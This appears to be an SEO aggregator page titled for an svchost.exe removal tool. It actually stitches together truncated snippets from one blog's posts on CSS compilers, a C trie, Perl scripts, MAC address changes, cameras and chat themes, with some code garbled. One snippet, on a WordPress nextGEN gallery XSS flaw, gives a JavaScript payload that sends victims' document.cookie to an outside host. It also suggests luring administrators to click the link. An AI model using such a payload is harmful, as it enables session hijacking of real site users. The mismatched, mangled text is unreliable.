03 Jan, 2011

New svchost.exe removal tool

Articles related to new svchost.exe removal tool

Less CSS Compiler for Windows (lessc.exe)

http://digitalpbk.com/less-css/less-css-compiler-windows-lesscexe Less CSS Compiler for Windows (lessc.exe) of things. Like it adds a less extension to the filename you passed, even though you dont have a less extension to the actual file. Source code The source code is forked on github, Check it out https://github.com/madaboutcode/dotless :) Thanks to Ajeesh Mohan for the new code that accepts less from std input. Django CSS Software ...
Published 9 months ago

T9 Dictionary Implementation in C, BASH

http://digitalpbk.blogspot.com/2008/07/trie-data-structure-c-t9.html T9 Dictionary Implementation in C, BASH /*t9.cDependency : t9.dicA file with lots of words to populate our t9 trie structure.All in small letter no spaces no other charactersTerminated by a line with only a 0 (zero)=================*/#include #include #include struct t9{ struct t9 * node[27];};struct t9 * t9_new(){ struct t9 * r = (struct t9 *)malloc(sizeof(struct t9)); int i=0; for(;inode[i] = (struct t9 *)0; return r;}void t9_free(struct t9 * root){ if(root) { int i=0; for ...
Published 3 years, 6 months ago

yum/apt-get update Breaks Perl CPAN

http://digitalpbk.blogspot.com/2009/07/perl-update-code-500-architecture.html /.cpan/Metadata Database was generated on Mon, 15 Jun 2009 02:27:28 GMTGoing to read /root/.cpan/sources/authors/01mailrc.txt.gzCPAN: Compress::Zlib loaded okGoing to read /root/.cpan/sources/modules/02packages.details.txt.gz Database was generated on Wed, 08 Jul 2009 02:28:24 GMTCPAN: HTTP::Date loaded ok There's a new CPAN.pm version (v1.9402) available! [Current version is v1.7602] You might want to try install Bundle::CPAN reload cpan without quitting the current session. It should be a seamless ...
Published 2 years, 7 months ago

Perl Script to Login to Orkut

http://digitalpbk.blogspot.com/2007/05/perl-script-to-login-to-orkut.html and GET the redirect page URLGoto the redirect pageGoto Orkut.com/home.aspxYour done.Note:Tested on Linux (FC6, Perl 5.8.8)The following script is for linux, Will run on Windows too but the ANSI coloring may not work...Windows Program is given below the program for Linux (without ANSI coloring).For Linux (with ANSI coloring)use WWW::Mechanize;use HTTP::Cookies;use HTTP::Request::Common;$cj=HTTP::Cookies->new(file => "cookie.jar",autosave=>1,ignore_discard=>1);$mech ...
Published 4 years, 9 months ago

Resolve Net::MySQL Hang problem if the database result has only 1 row or is empty

http://digitalpbk.com/perl/solve-netmysql-hang-problem-if-database-result-has-only-1-row-or-empty Resolve Net::MySQL Hang problem if the database result has only 1 row or is empty Net::MySQL is a simple MySQL perl Client to connect to MySQL servers. But Net::MySQL hangs if your result set is having just one row. Sample Net::MySQL code #!/usr/bin/perl use Net::MySQL; $mysql = Net::MySQL->new( hostname => 'localhost', database => 'db', user => 'user', password => 'password', ); $gid = 1; $mysql->query('SELECT * FROM table ...
Published 1 year, 10 months ago

Change Network adapter MAC address on Windows 7

http://digitalpbk.com/windows/change-network-adapter-mac-address-windows-7 Change Network adapter MAC address on Windows 7 a value (HEX 0-9,A-F) on the right side textbox AAAAAAAAAAAA as shown If you cant find this option then your network adapter does not support this property. Thats all, To verify goto Command Line and run ipconfig /all to verify your new Physical Address Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8102E/RTL8103E Family PCI-E Fa st Ethernet NIC (NDIS 6.20) Physical Address. . . . . . . . . : AA ...
Published 1 year, 10 months ago

Compare Canon Powershot SX120IS vs Canon SX130IS (New)

http://digitalpbk.com/canon-sx-series/compare-canon-sx120is-vs-canon-sx130is-new Compare Canon Powershot SX120IS vs Canon SX130IS (New) Compare Canon Powershot SX120IS vs Canon SX130IS (New) Canon has launched its next version of the Powershot model CanonSX130IS. This can be considered a successor to Canon Powershot SX120IS. The new model has a 12x optical zoom and 12 MegaPixel resolution compared to the older SX120 with a 10 mega pixel resolution and 10x optical zoom. The new version has HD video recording capability shooting at 1280 x 720 resolution. The 12 Megapixel camera can shoot at approximately 4000 x 3000 pixels ...
Published 1 year, 3 months ago

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html code can be put for stealing the cookie:(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 6 months ago

Making Google talk Chat Themes

http://digitalpbk.blogspot.com/2007/06/google-talk-chat-themes.html .Custom skins that we create must come under this folder:X:\Documents and Settings\[Profile Name; Eg: Administrator.000]\Local Settings\Application Data\Google\Google Talk\themes\user\chatLet us start creating a new skin name "digitalpbk"Make a folder inside the above folder named "digitalpbk"X:\Documents and Settings\[Profile Name; Eg: Administrator.000]\Local Settings\Application Data\Google\Google Talk\themes\user\chat\digitalpbkMake a folder inside it named ContentMake one more ...
Published 4 years, 7 months ago

Free Light weight Social media sharing javascript for Facebook, Twitter, Stumble Upon, Digg and Reddit

http://digitalpbk.com/javascript/free-light-small-social-media-sharing-javascript-facebook-twitter-stumble-upon-digg-and-r )); b||(b=encodeURIComponent(document.title));a=a.replace("##URL##",c);a=a.replace("##TITLE##",b);window.open(a,"sharewindow"+a.substr(6,15),"width=640,height=480")}}; Copy paste the above code to any of your javascript files or add a new file or include it in your html source. ( //The above code here. ) Use onclick events of Buttons or Images to fire the functions. :) For more check out the buttons below ... Javascript Software ...
Published 1 year, 10 months ago

Related help topics for new svchost.exe removal tool More keywords like new svchost.exe removal tool
More pages for new svchost.exe removal tool


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Barefoot Resort Reception Barefoot Resort Reception in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk